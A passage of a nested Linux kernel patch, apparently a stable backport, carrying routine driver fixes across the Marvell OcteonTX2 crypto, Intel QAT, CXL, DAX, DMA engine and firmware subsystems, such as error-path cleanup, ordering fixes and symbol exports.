+ rvu_cptpf-objs := otx2_cptpf_main.o otx2_cptpf_mbox.o \
+-		  otx2_cpt_mbox_common.o otx2_cptpf_ucode.o otx2_cptlf.o \
+-		  cn10k_cpt.o otx2_cpt_devlink.o
+-rvu_cptvf-objs := otx2_cptvf_main.o otx2_cptvf_mbox.o otx2_cptlf.o \
+-		  otx2_cpt_mbox_common.o otx2_cptvf_reqmgr.o \
+-		  otx2_cptvf_algs.o cn10k_cpt.o
++		  otx2_cptpf_ucode.o otx2_cpt_devlink.o
++rvu_cptvf-objs := otx2_cptvf_main.o otx2_cptvf_mbox.o \
++		  otx2_cptvf_reqmgr.o otx2_cptvf_algs.o
+ 
+ ccflags-y += -I$(srctree)/drivers/net/ethernet/marvell/octeontx2/af
+diff --git a/drivers/crypto/marvell/octeontx2/cn10k_cpt.c b/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
+index 1499ef75b5c22..93d22b3289919 100644
+--- a/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
++++ b/drivers/crypto/marvell/octeontx2/cn10k_cpt.c
+@@ -7,6 +7,9 @@
+ #include "otx2_cptlf.h"
+ #include "cn10k_cpt.h"
+ 
++static void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
++			       struct otx2_cptlf_info *lf);
++
+ static struct cpt_hw_ops otx2_hw_ops = {
+ 	.send_cmd = otx2_cpt_send_cmd,
+ 	.cpt_get_compcode = otx2_cpt_get_compcode,
+@@ -19,8 +22,8 @@ static struct cpt_hw_ops cn10k_hw_ops = {
+ 	.cpt_get_uc_compcode = cn10k_cpt_get_uc_compcode,
+ };
+ 
+-void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
+-			struct otx2_cptlf_info *lf)
++static void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
++			       struct otx2_cptlf_info *lf)
+ {
+ 	void __iomem *lmtline = lf->lmtline;
+ 	u64 val = (lf->slot & 0x7FF);
+@@ -68,6 +71,7 @@ int cn10k_cptpf_lmtst_init(struct otx2_cptpf_dev *cptpf)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(cn10k_cptpf_lmtst_init, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf)
+ {
+@@ -91,3 +95,4 @@ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(cn10k_cptvf_lmtst_init, CRYPTO_DEV_OCTEONTX2_CPT);
+diff --git a/drivers/crypto/marvell/octeontx2/cn10k_cpt.h b/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
+index c091392b47e0f..aaefc7e38e060 100644
+--- a/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
++++ b/drivers/crypto/marvell/octeontx2/cn10k_cpt.h
+@@ -28,8 +28,6 @@ static inline u8 otx2_cpt_get_uc_compcode(union otx2_cpt_res_s *result)
+ 	return ((struct cn9k_cpt_res_s *)result)->uc_compcode;
+ }
+ 
+-void cn10k_cpt_send_cmd(union otx2_cpt_inst_s *cptinst, u32 insts_num,
+-			struct otx2_cptlf_info *lf);
+ int cn10k_cptpf_lmtst_init(struct otx2_cptpf_dev *cptpf);
+ int cn10k_cptvf_lmtst_init(struct otx2_cptvf_dev *cptvf);
+ 
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h b/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
+index 5012b7e669f07..6019066a6451a 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
++++ b/drivers/crypto/marvell/octeontx2/otx2_cpt_common.h
+@@ -145,8 +145,6 @@ int otx2_cpt_send_mbox_msg(struct otx2_mbox *mbox, struct pci_dev *pdev);
+ 
+ int otx2_cpt_send_af_reg_requests(struct otx2_mbox *mbox,
+ 				  struct pci_dev *pdev);
+-int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+-			     u64 reg, u64 *val, int blkaddr);
+ int otx2_cpt_add_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			      u64 reg, u64 val, int blkaddr);
+ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c b/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
+index a317319696eff..115997475beb3 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cpt_mbox_common.c
+@@ -19,6 +19,7 @@ int otx2_cpt_send_mbox_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ 	}
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_mbox_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_send_ready_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ {
+@@ -36,14 +37,17 @@ int otx2_cpt_send_ready_msg(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_ready_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_send_af_reg_requests(struct otx2_mbox *mbox, struct pci_dev *pdev)
+ {
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_send_af_reg_requests, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+-int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+-			     u64 reg, u64 *val, int blkaddr)
++static int otx2_cpt_add_read_af_reg(struct otx2_mbox *mbox,
++				    struct pci_dev *pdev, u64 reg,
++				    u64 *val, int blkaddr)
+ {
+ 	struct cpt_rd_wr_reg_msg *reg_msg;
+ 
+@@ -91,6 +95,7 @@ int otx2_cpt_add_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_add_write_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			 u64 reg, u64 *val, int blkaddr)
+@@ -103,6 +108,7 @@ int otx2_cpt_read_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_read_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 			  u64 reg, u64 val, int blkaddr)
+@@ -115,6 +121,7 @@ int otx2_cpt_write_af_reg(struct otx2_mbox *mbox, struct pci_dev *pdev,
+ 
+ 	return otx2_cpt_send_mbox_msg(mbox, pdev);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_write_af_reg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_attach_rscrs_msg(struct otx2_cptlfs_info *lfs)
+ {
+@@ -170,6 +177,7 @@ int otx2_cpt_detach_rsrcs_msg(struct otx2_cptlfs_info *lfs)
+ 
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_detach_rsrcs_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_msix_offset_msg(struct otx2_cptlfs_info *lfs)
+ {
+@@ -202,6 +210,7 @@ int otx2_cpt_msix_offset_msg(struct otx2_cptlfs_info *lfs)
+ 	}
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_msix_offset_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cpt_sync_mbox_msg(struct otx2_mbox *mbox)
+ {
+@@ -216,3 +225,4 @@ int otx2_cpt_sync_mbox_msg(struct otx2_mbox *mbox)
+ 
+ 	return otx2_mbox_check_rsp_msgs(mbox, 0);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cpt_sync_mbox_msg, CRYPTO_DEV_OCTEONTX2_CPT);
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+index c8350fcd60fab..71e5f79431afa 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptlf.c
+@@ -274,6 +274,8 @@ void otx2_cptlf_unregister_interrupts(struct otx2_cptlfs_info *lfs)
+ 	}
+ 	cptlf_disable_intrs(lfs);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_unregister_interrupts,
++		     CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ static int cptlf_do_register_interrrupts(struct otx2_cptlfs_info *lfs,
+ 					 int lf_num, int irq_offset,
+@@ -321,6 +323,7 @@ free_irq:
+ 	otx2_cptlf_unregister_interrupts(lfs);
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_register_interrupts, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ void otx2_cptlf_free_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ {
+@@ -334,6 +337,7 @@ void otx2_cptlf_free_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ 		free_cpumask_var(lfs->lf[slot].affinity_mask);
+ 	}
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_free_irqs_affinity, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cptlf_set_irqs_affinity(struct otx2_cptlfs_info *lfs)
+ {
+@@ -366,6 +370,7 @@ free_affinity_mask:
+ 	otx2_cptlf_free_irqs_affinity(lfs);
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_set_irqs_affinity, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ int otx2_cptlf_init(struct otx2_cptlfs_info *lfs, u8 eng_grp_mask, int pri,
+ 		    int lfs_num)
+@@ -422,6 +427,7 @@ clear_lfs_num:
+ 	lfs->lfs_num = 0;
+ 	return ret;
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_init, CRYPTO_DEV_OCTEONTX2_CPT);
+ 
+ void otx2_cptlf_shutdown(struct otx2_cptlfs_info *lfs)
+ {
+@@ -431,3 +437,8 @@ void otx2_cptlf_shutdown(struct otx2_cptlfs_info *lfs)
+ 	/* Send request to detach LFs */
+ 	otx2_cpt_detach_rsrcs_msg(lfs);
+ }
++EXPORT_SYMBOL_NS_GPL(otx2_cptlf_shutdown, CRYPTO_DEV_OCTEONTX2_CPT);
++
++MODULE_AUTHOR("Marvell");
++MODULE_DESCRIPTION("Marvell RVU CPT Common module");
++MODULE_LICENSE("GPL");
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c b/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
+index a402ccfac5577..ddf6e913c1c45 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptpf_main.c
+@@ -831,6 +831,8 @@ static struct pci_driver otx2_cpt_pci_driver = {
+ 
+ module_pci_driver(otx2_cpt_pci_driver);
+ 
++MODULE_IMPORT_NS(CRYPTO_DEV_OCTEONTX2_CPT);
++
+ MODULE_AUTHOR("Marvell");
+ MODULE_DESCRIPTION(OTX2_CPT_DRV_STRING);
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+index 3411e664cf50c..392e9fee05e81 100644
+--- a/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
++++ b/drivers/crypto/marvell/octeontx2/otx2_cptvf_main.c
+@@ -429,6 +429,8 @@ static struct pci_driver otx2_cptvf_pci_driver = {
+ 
+ module_pci_driver(otx2_cptvf_pci_driver);
+ 
++MODULE_IMPORT_NS(CRYPTO_DEV_OCTEONTX2_CPT);
++
+ MODULE_AUTHOR("Marvell");
+ MODULE_DESCRIPTION("Marvell RVU CPT Virtual Function Driver");
+ MODULE_LICENSE("GPL v2");
+diff --git a/drivers/crypto/qat/qat_common/qat_algs.c b/drivers/crypto/qat/qat_common/qat_algs.c
+index cad9c58caab13..f56ee4cc5ae8b 100644
+--- a/drivers/crypto/qat/qat_common/qat_algs.c
++++ b/drivers/crypto/qat/qat_common/qat_algs.c
+@@ -434,8 +434,8 @@ static void qat_alg_skcipher_init_com(struct qat_alg_skcipher_ctx *ctx,
+ 	} else if (aes_v2_capable && mode == ICP_QAT_HW_CIPHER_CTR_MODE) {
+ 		ICP_QAT_FW_LA_SLICE_TYPE_SET(header->serv_specif_flags,
+ 					     ICP_QAT_FW_LA_USE_UCS_SLICE_TYPE);
+-		keylen = round_up(keylen, 16);
+ 		memcpy(cd->ucs_aes.key, key, keylen);
++		keylen = round_up(keylen, 16);
+ 	} else {
+ 		memcpy(cd->aes.key, key, keylen);
+ 	}
+diff --git a/drivers/cxl/pmem.c b/drivers/cxl/pmem.c
+index 4c627d67281a1..1fca9848883d8 100644
+--- a/drivers/cxl/pmem.c
++++ b/drivers/cxl/pmem.c
+@@ -75,6 +75,7 @@ static int cxl_nvdimm_probe(struct device *dev)
+ 		goto out;
+ 
+ 	set_bit(NDD_LABELING, &flags);
++	set_bit(NDD_REGISTER_SYNC, &flags);
+ 	set_bit(ND_CMD_GET_CONFIG_SIZE, &cmd_mask);
+ 	set_bit(ND_CMD_GET_CONFIG_DATA, &cmd_mask);
+ 	set_bit(ND_CMD_SET_CONFIG_DATA, &cmd_mask);
+diff --git a/drivers/dax/bus.c b/drivers/dax/bus.c
+index 1dad813ee4a69..c64e7076537cb 100644
+--- a/drivers/dax/bus.c
++++ b/drivers/dax/bus.c
+@@ -427,8 +427,8 @@ static void unregister_dev_dax(void *dev)
+ 	dev_dbg(dev, "%s\n", __func__);
+ 
+ 	kill_dev_dax(dev_dax);
+-	free_dev_dax_ranges(dev_dax);
+ 	device_del(dev);
++	free_dev_dax_ranges(dev_dax);
+ 	put_device(dev);
+ }
+ 
+diff --git a/drivers/dax/kmem.c b/drivers/dax/kmem.c
+index 4852a2dbdb278..4aa758a2b3d1b 100644
+--- a/drivers/dax/kmem.c
++++ b/drivers/dax/kmem.c
+@@ -146,7 +146,7 @@ static int dev_dax_kmem_probe(struct dev_dax *dev_dax)
+ 		if (rc) {
+ 			dev_warn(dev, "mapping%d: %#llx-%#llx memory add failed\n",
+ 					i, range.start, range.end);
+-			release_resource(res);
++			remove_resource(res);
+ 			kfree(res);
+ 			data->res[i] = NULL;
+ 			if (mapped)
+@@ -195,7 +195,7 @@ static void dev_dax_kmem_remove(struct dev_dax *dev_dax)
+ 
+ 		rc = remove_memory(range.start, range_len(&range));
+ 		if (rc == 0) {
+-			release_resource(data->res[i]);
++			remove_resource(data->res[i]);
+ 			kfree(data->res[i]);
+ 			data->res[i] = NULL;
+ 			success++;
+diff --git a/drivers/dma/Kconfig b/drivers/dma/Kconfig
+index 7524b62a8870a..b64ae02c26f8c 100644
+--- a/drivers/dma/Kconfig
++++ b/drivers/dma/Kconfig
+@@ -244,7 +244,7 @@ config FSL_RAID
+ 
+ config HISI_DMA
+ 	tristate "HiSilicon DMA Engine support"
+-	depends on ARM64 || COMPILE_TEST
++	depends on ARCH_HISI || COMPILE_TEST
+ 	depends on PCI_MSI
+ 	select DMA_ENGINE
+ 	select DMA_VIRTUAL_CHANNELS
+diff --git a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+index bf85aa0979ecb..152c5d98524d7 100644
+--- a/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
++++ b/drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c
+@@ -325,8 +325,6 @@ dma_chan_tx_status(struct dma_chan *dchan, dma_cookie_t cookie,
+ 		len = vd_to_axi_desc(vdesc)->hw_desc[0].len;
+ 		completed_length = completed_blocks * len;
+ 		bytes = length - completed_length;
+-	} else {
+-		bytes = vd_to_axi_desc(vdesc)->length;
+ 	}
+ 
+ 	spin_unlock_irqrestore(&chan->vc.lock, flags);
+diff --git a/drivers/dma/dw-edma/dw-edma-core.c b/drivers/dma/dw-edma/dw-edma-core.c
+index c54b24ff5206a..52bdf04aff511 100644
+--- a/drivers/dma/dw-edma/dw-edma-core.c
++++ b/drivers/dma/dw-edma/dw-edma-core.c
+@@ -455,6 +455,8 @@ dw_edma_device_transfer(struct dw_edma_transfer *xfer)
+ 				 * and destination addresses are increased
+ 				 * by the same portion (data length)
+ 				 */
++			} else if (xfer->type == EDMA_XFER_INTERLEAVED) {
++				burst->dar = dst_addr;
+ 			}
+ 		} else {
+ 			burst->dar = dst_addr;
+@@ -470,6 +472,8 @@ dw_edma_device_transfer(struct dw_edma_transfer *xfer)
+ 				 * and destination addresses are increased
+ 				 * by the same portion (data length)
+ 				 */
++			}  else if (xfer->type == EDMA_XFER_INTERLEAVED) {
++				burst->sar = src_addr;
+ 			}
+ 		}
+ 
+diff --git a/drivers/dma/dw-edma/dw-edma-v0-core.c b/drivers/dma/dw-edma/dw-edma-v0-core.c
+index 77e6cfe52e0a3..a3816ba632851 100644
+--- a/drivers/dma/dw-edma/dw-edma-v0-core.c
++++ b/drivers/dma/dw-edma/dw-edma-v0-core.c
+@@ -192,7 +192,7 @@ static inline void writeq_ch(struct dw_edma *dw, enum dw_edma_dir dir, u16 ch,
+ static inline u64 readq_ch(struct dw_edma *dw, enum dw_edma_dir dir, u16 ch,
+ 			   const void __iomem *addr)
+ {
+-	u32 value;
++	u64 value;
+ 
+ 	if (dw->chip->mf == EDMA_MF_EDMA_LEGACY) {
+ 		u32 viewport_sel;
+diff --git a/drivers/dma/idxd/device.c b/drivers/dma/idxd/device.c
+index 6d8ff664fdfb2..3b4ad7739f9ee 100644
+--- a/drivers/dma/idxd/device.c
++++ b/drivers/dma/idxd/device.c
+@@ -702,7 +702,7 @@ static void idxd_groups_clear_state(struct idxd_device *idxd)
+ 		group->use_rdbuf_limit = false;
+ 		group->rdbufs_allowed = 0;
+ 		group->rdbufs_reserved = 0;
+-		if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override) {
++		if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override) {
+ 			group->tc_a = 1;
+ 			group->tc_b = 1;
+ 		} else {
+diff --git a/drivers/dma/idxd/init.c b/drivers/dma/idxd/init.c
+index 09cbf0c179ba9..e0f49545d89ff 100644
+--- a/drivers/dma/idxd/init.c
++++ b/drivers/dma/idxd/init.c
+@@ -296,7 +296,7 @@ static int idxd_setup_groups(struct idxd_device *idxd)
+ 		}
+ 
+ 		idxd->groups[i] = group;
+-		if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override) {
++		if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override) {
+ 			group->tc_a = 1;
+ 			group->tc_b = 1;
+ 		} else {
+diff --git a/drivers/dma/idxd/sysfs.c b/drivers/dma/idxd/sysfs.c
+index 3229dfc786507..18cd8151dee02 100644
+--- a/drivers/dma/idxd/sysfs.c
++++ b/drivers/dma/idxd/sysfs.c
+@@ -387,7 +387,7 @@ static ssize_t group_traffic_class_a_store(struct device *dev,
+ 	if (idxd->state == IDXD_DEV_ENABLED)
+ 		return -EPERM;
+ 
+-	if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override)
++	if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override)
+ 		return -EPERM;
+ 
+ 	if (val < 0 || val > 7)
+@@ -429,7 +429,7 @@ static ssize_t group_traffic_class_b_store(struct device *dev,
+ 	if (idxd->state == IDXD_DEV_ENABLED)
+ 		return -EPERM;
+ 
+-	if (idxd->hw.version < DEVICE_VERSION_2 && !tc_override)
++	if (idxd->hw.version <= DEVICE_VERSION_2 && !tc_override)
+ 		return -EPERM;
+ 
+ 	if (val < 0 || val > 7)
+diff --git a/drivers/dma/ptdma/ptdma-dmaengine.c b/drivers/dma/ptdma/ptdma-dmaengine.c
+index cc22d162ce250..1aa65e5de0f3a 100644
+--- a/drivers/dma/ptdma/ptdma-dmaengine.c
++++ b/drivers/dma/ptdma/ptdma-dmaengine.c
+@@ -254,7 +254,7 @@ static void pt_issue_pending(struct dma_chan *dma_chan)
+ 	spin_unlock_irqrestore(&chan->vc.lock, flags);
+ 
+ 	/* If there was nothing active, start processing */
+-	if (engine_is_idle)
++	if (engine_is_idle && desc)
+ 		pt_cmd_callback(desc, 0);
+ }
+ 
+diff --git a/drivers/dma/sf-pdma/sf-pdma.c b/drivers/dma/sf-pdma/sf-pdma.c
+index 6b524eb6bcf3a..e578ad5569494 100644
+--- a/drivers/dma/sf-pdma/sf-pdma.c
++++ b/drivers/dma/sf-pdma/sf-pdma.c
+@@ -96,7 +96,6 @@ sf_pdma_prep_dma_memcpy(struct dma_chan *dchan,	dma_addr_t dest, dma_addr_t src,
+ 	if (!desc)
+ 		return NULL;
+ 
+-	desc->in_use = true;
+ 	desc->dirn = DMA_MEM_TO_MEM;
+ 	desc->async_tx = vchan_tx_prep(&chan->vchan, &desc->vdesc, flags);
+ 
+@@ -290,7 +289,7 @@ static void sf_pdma_free_desc(struct virt_dma_desc *vdesc)
+ 	struct sf_pdma_desc *desc;
+ 
+ 	desc = to_sf_pdma_desc(vdesc);
+-	desc->in_use = false;
++	kfree(desc);
+ }
+ 
+ static void sf_pdma_donebh_tasklet(struct tasklet_struct *t)
+diff --git a/drivers/dma/sf-pdma/sf-pdma.h b/drivers/dma/sf-pdma/sf-pdma.h
+index dcb3687bd5da2..5c398a83b491a 100644
+--- a/drivers/dma/sf-pdma/sf-pdma.h
++++ b/drivers/dma/sf-pdma/sf-pdma.h
+@@ -78,7 +78,6 @@ struct sf_pdma_desc {
+ 	u64				src_addr;
+ 	struct virt_dma_desc		vdesc;
+ 	struct sf_pdma_chan		*chan;
+-	bool				in_use;
+ 	enum dma_transfer_direction	dirn;
+ 	struct dma_async_tx_descriptor *async_tx;
+ };
+diff --git a/drivers/firmware/dmi-sysfs.c b/drivers/firmware/dmi-sysfs.c
+index 66727ad3361b9..402217c570333 100644
+--- a/drivers/firmware/dmi-sysfs.c
++++ b/drivers/firmware/dmi-sysfs.c
+@@ -603,16 +603,16 @@ static void __init dmi_sysfs_register_handle(const struct dmi_header *dh,
+ 	*ret = kobject_init_and_add(&entry->kobj, &dmi_sysfs_entry_ktype, NULL,
+ 				    "%d-%d", dh->type, entry->instance);
+ 
+-	if (*ret) {
+-		kobject_put(&entry->kobj);
+-		return;
+-	}
+-
+ 	/* Thread on the global list for cleanup */
+ 	spin_lock(&entry_list_lock);
+ 	list_add_tail(&entry->list, &entry_list);
+ 	spin_unlock(&entry_list_lock);
+ 
++	if (*ret) {
++		kobject_put(&entry->kobj);
++		return;
++	}
++
+ 	/* Handle specializations by type */
+ 	switch (dh->type) {
+ 	case DMI_ENTRY_SYSTEM_EVENT_LOG:
+diff --git a/drivers/firmware/google/framebuffer-coreboot.c b/drivers/firmware/google/framebuffer-coreboot.c
+index c6dcc1ef93acf..c323a818805cc 100644
+--- a/drivers/firmware/google/framebuffer-coreboot.c
++++ b/drivers/firmware/google/framebuffer-coreboot.c
+@@ -43,9 +43,7 @@ static int framebuffer_probe(struct coreboot_device *dev)
+ 		    fb->green_mask_pos     == formats[i].green.offset &&
+ 		    fb->green_mask_size    == formats[i].green.length &&
+ 		    fb->blue_mask_pos      == formats[i].blue.offset &&
+-		    fb->blue_mask_size     == formats[i].blue.length &&
+-		    fb->reserved_mask_pos  == formats[i].transp.offset &&
+-		    fb->reserved_mask_size == formats[i].transp.length)
++		    fb->blue_mask_size     == formats[i].blue.length)
+ 			pdata.format = formats[i].name;
+ 	}
+ 	if (!pdata.format)
+diff --git a/drivers/firmware/psci/psci.c b/drivers/firmware/psci/psci.c
+index 447ee4ea5c903..f78249fe2512a 100644
+--- a/drivers/firmware/psci/psci.c
++++ b/drivers/firmware/psci/psci.c
+@@ -108,9 +108,10 @@ bool psci_power_state_is_valid(u32 state)
+ 	return !(state & ~valid_mask);
+ }
+ 
+-static unsigned long __invoke_psci_fn_hvc(unsigned long function_id,
+-			unsigned long arg0, unsigned long arg1,
+-			unsigned long arg2)
++static __always_inline unsigned long
++__invoke_psci_fn_hvc(unsigned long function_id,
++		     unsigned long arg0, unsigned long arg1,
++		     unsigned long arg2)
+ {
+ 	struct arm_smccc_res res;
+ 
+@@ -118,9 +119,10 @@ static unsigned long __invoke_psci_fn_hvc(unsigned long function_id,
+ 	return res.a0;
+ }
+ 
+-static unsigned long __invoke_psci_fn_smc(unsigned long function_id,
+-			unsigned long arg0, unsigned long arg1,
+-			unsigned long arg2)
++static __always_inline unsigned long
++__invoke_psci_fn_smc(unsigned long function_id,
++		     unsigned long arg0, unsigned long arg1,
++		     unsigned long arg2)
+ {
+ 	struct arm_smccc_res res;
+ 
+@@ -128,7 +130,7 @@ static unsigned long __invoke_psci_fn_smc(unsigned long function_id,
+ 	return res.a0;
+ }
+ 
+-static int psci_to_linux_errno(int errno)
++static __always_inline int psci_to_linux_errno(int errno)
+ {
+ 	switch (errno) {
+ 	case PSCI_RET_SUCCESS:
+@@ -169,7 +171,8 @@ int psci_set_osi_mode(bool enable)
+ 	return psci_to_linux_errno(err);
+ }
+ 
+-static int __psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
++static __always_inline int
++__psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
+ {
+ 	int err;
+ 
+@@ -177,13 +180,15 @@ static int __psci_cpu_suspend(u32 fn, u32 state, unsigned long entry_point)
+ 	return psci_to_linux_errno(err);
+ }
+ 
+-static int psci_0_1_cpu_suspend(u32 state, unsigned long entry_point)
++static __always_inline int
++psci_0_1_cpu_suspend(u32 state, unsigned long entry_point)
+ {
+ 	return __psci_cpu_suspend(psci_0_1_function_ids.cpu_suspend,
+ 				  state, entry_point);
+ }
+ 
+-static int psci_0_2_cpu_suspend(u32 state, unsigned long entry_point)
++static __always_inline int
++psci_0_2_cpu_suspend(u32 state, unsigned long entry_point)
+ {
+ 	return __psci_cpu_suspend(PSCI_FN_NATIVE(0_2, CPU_SUSPEND),
+ 				  state, entry_point);
+@@ -450,10 +455,12 @@ late_initcall(psci_debugfs_init)
+ #endif
+ 
+ #ifdef CONFIG_CPU_IDLE
+-static int psci_suspend_finisher(unsigned long state)
++static noinstr int psci_suspend_finisher(unsigned long state)
+ {
+ 	u32 power_state = state;
+-	phys_addr_t pa_cpu_resume = __pa_symbol(cpu_resume);
++	phys_addr_t pa_cpu_resume;
++
++	pa_cpu_resume = __pa_symbol_nodebug((unsigned long)cpu_resume);
+ 
+ 	return psci_ops.cpu_suspend(power_state, pa_cpu_resume);
+ }
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index b4081f4d88a37..bde1f543f5298 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -1138,13 +1138,17 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 
+ 	/* allocate service controller and supporting channel */
+ 	controller = devm_kzalloc(dev, sizeof(*controller), GFP_KERNEL);
+-	if (!controller)
+-		return -ENOMEM;
++	if (!controller) {
++		ret = -ENOMEM;
++		goto err_destroy_pool;
++	}
+ 
+ 	chans = devm_kmalloc_array(dev, SVC_NUM_CHANNEL,
+ 				   sizeof(*chans), GFP_KERNEL | __GFP_ZERO);
+-	if (!chans)
+-		return -ENOMEM;
++	if (!chans) {
++		ret = -ENOMEM;
++		goto err_destroy_pool;
++	}
+ 
+ 	controller->dev = dev;
+ 	controller->num_chans = SVC_NUM_CHANNEL;
+@@ -1159,7 +1163,7 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 	ret = kfifo_alloc(&controller->svc_fifo, fifo_size, GFP_KERNEL);
+ 	if (ret) {
+ 		dev_err(dev, "failed to allocate FIFO\n");
+-		return ret;
++		goto err_destroy_pool;
+ 	}
+ 	spin_lock_init(&controller->svc_fifo_lock);
+ 
+@@ -1198,19 +1202,20 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 	ret = platform_device_add(svc->stratix10_svc_rsu);
+ 	if (ret) {
+ 		platform_device_put(svc->stratix10_svc_rsu);
+-		return ret;
++		goto err_free_kfifo;
+ 	}
+ 
+ 	svc->intel_svc_fcs = platform_device_alloc(INTEL_FCS, 1);
+ 	if (!svc->intel_svc_fcs) {
+ 		dev_err(dev, "failed to allocate %s device\n", INTEL_FCS);
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto err_unregister_dev;
+ 	}
+ 
+ 	ret = platform_device_add(svc->intel_svc_fcs);
+ 	if (ret) {
+ 		platform_device_put(svc->intel_svc_fcs);
+-		return ret;
++		goto err_unregister_dev;
+ 	}
+ 
+ 	dev_set_drvdata(dev, svc);
+@@ -1219,8 +1224,12 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 
+ 	return 0;
+ 
++err_unregister_dev:
++	platform_device_unregister(svc->stratix10_svc_rsu);
+ err_free_kfifo:
+ 	kfifo_free(&controller->svc_fifo);
++err_destroy_pool:
++	gen_pool_destroy(genpool);
+ 	return ret;
+ }
+ 
